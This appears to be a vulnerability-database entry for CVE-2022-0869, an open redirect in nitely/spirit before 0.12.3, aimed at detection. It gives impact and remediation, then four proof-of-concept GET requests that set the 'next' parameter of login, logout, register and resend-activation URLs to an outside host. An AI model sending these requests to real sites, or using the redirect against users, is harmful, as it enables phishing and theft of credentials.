🔙 목록으로 돌아가기

CVE-2022-0869: nitely/spirit 0.12.3 - Open Redirect

Titlenitely/spirit 0.12.3 - Open Redirect
Authorctflearner
SeverityMedium
ImpactAn attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
RemediationUpgrade to a patched version of nitely/spirit to mitigate the open redirect vulnerability (CVE-2022-0869).
CVSS Score6.1
EPSS Score0.04224
CVE IDCVE-2022-0869
CWE IDCWE-601
Tags cve cve2022 huntr redirect nitely spirit spirit-project vuln

🔍 Vulnerability Description

Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3.

🌐 HTTP Request

GET /user/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /user/logout?next=https%3A%2F%2Finteract.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /user/register?next=https%3A%2F%2Finteract.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /user/resend-activation?next=https%3A%2F%2Finteract.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0869.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0869.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A